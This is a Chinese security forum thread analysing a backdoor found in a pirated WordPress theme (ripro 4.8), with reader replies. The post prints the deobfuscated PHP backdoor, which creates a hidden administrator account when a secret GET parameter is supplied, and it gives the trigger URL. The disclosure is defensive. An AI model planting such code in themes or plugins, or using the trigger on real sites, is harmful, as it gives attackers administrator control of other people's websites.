吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

搜索
查看: 10384|回复: 39
上一主题 下一主题

[PC样本分析] 关于本站ripro主题4.8版本后门分析

  [复制链接]
跳转到指定楼层
楼主
longgod 发表于 2019-12-16 22:41 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
本帖最后由 longgod 于 2019-12-17 00:42 编辑

原文链接:https://www.52pojie.cn/thread-1066825-1-1.html
下载后用D盾扫描

发现有加密文件,用Notepad++查看

破解混淆加密后得到源文件

经查看发现后门代码

[PHP] 纯文本查看 复制代码
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                require('wp-includes/registration.php');
                if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                        $user_id = wp_create_user('backdoor', '123456'); //创建账户
                        $user = new WP_User($user_id);
                        $user->set_role('administrator'); //设置为管理员权限
                }
        }
}

使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试





成功登录后台



推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。

解密后的文件
core.class.zip (4.02 KB, 下载次数: 234)
后门代码已注释,位于412-423行


我写的关于本次后门的解密方法:PHP【简单混淆加密】解密 https://www.52pojie.cn/thread-1074918-1-1.html

免费评分

参与人数 20威望 +1 吾爱币 +22 热心值 +18 收起 理由
Tao888 + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
weiyingcn + 1 + 1 也用这个主题 这个吓人
52pmap + 1 + 1 谢谢@Thanks!
Kyaru + 1 + 1 我很赞同!
siuhoapdou + 1 + 1 谢谢@Thanks!
贰叁伍 + 1 我很赞同!
wuxinsky + 1 + 1 好人
laogan + 1 + 1 谢谢@Thanks!
wi5101 + 1 谢谢@Thanks!
甘愿堕落 + 1 + 1 热心回复!
maifuzi + 1 热心回复!
生有涯知无涯 + 1 谢谢@Thanks!
52pjgy + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
aihaner + 1 + 1 吓得我赶紧找了个4.6的文件替换了
你号没了 + 1 + 1 用心讨论,共获提升!
pycon + 1 我很赞同!
langvs + 1 而且还不是真正的4.8版本
Hmily + 1 + 7 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
阿森 + 1 + 1 这种恶心的人,直接封号得了
qqmmjh + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

来自 2#
Hmily 发表于 2019-12-16 23:05
感谢,已ban并提醒大家注意。
推荐
schezi 发表于 2019-12-19 17:13
laogan 发表于 2019-12-17 10:33
楼主请问一下,我用的4.6版本。使用http(s)://你的域名/?backdoor=go访问没有创建账号  core.class.php文件 ...

用户名可以随便创建,你以为他就会创建backdoor这个权限的管理员啊
5#
ids 发表于 2019-12-16 22:58
分享加后门不要脸啊。。。所以说有加密的脚本,还真要多留个心眼。感谢楼主分享。
6#
Mee.Love.R 发表于 2019-12-16 23:00
楼主很厉害!
7#
软件我来了 发表于 2019-12-16 23:10
果然有后门啊,而且那个好像也不是真正的4.8版本。
8#
xiajin 发表于 2019-12-16 23:21
楼主,怎么解密的啊,我想知道这块
9#
暮色渐蓝 发表于 2019-12-16 23:23
丧心病狂啊,我赶紧试试,果然有
10#
肖伟95 发表于 2019-12-16 23:28
球解密版,要不然用不了😊
11#
skyuce 发表于 2019-12-16 23:35
我不是在意什么人,我只是想说...放后门真的用backdoor这么显眼的吗?
12#
rsgdxp 发表于 2019-12-17 01:48
4.6版的好像也有几个帖子 。。。是故意加后门的还是不知分享的。。。故意加后门太可耻。。。。。。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2020-9-29 20:55

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表